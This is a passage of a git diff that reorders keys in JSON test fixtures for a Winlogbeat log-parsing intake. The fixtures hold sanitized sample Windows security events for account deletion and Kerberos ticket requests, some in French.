Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}" + } }, "expected": { "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json index 53d650df2..c7ac196ea 100644 --- a/Beats/winlogbeat/tests/security_event_4768.json +++ b/Beats/winlogbeat/tests/security_event_4768.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json index 7b1f0f39d..ac4cdd94d 100644 --- a/Beats/winlogbeat/tests/security_event_4769.json +++ b/Beats/winlogbeat/tests/security_event_4769.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 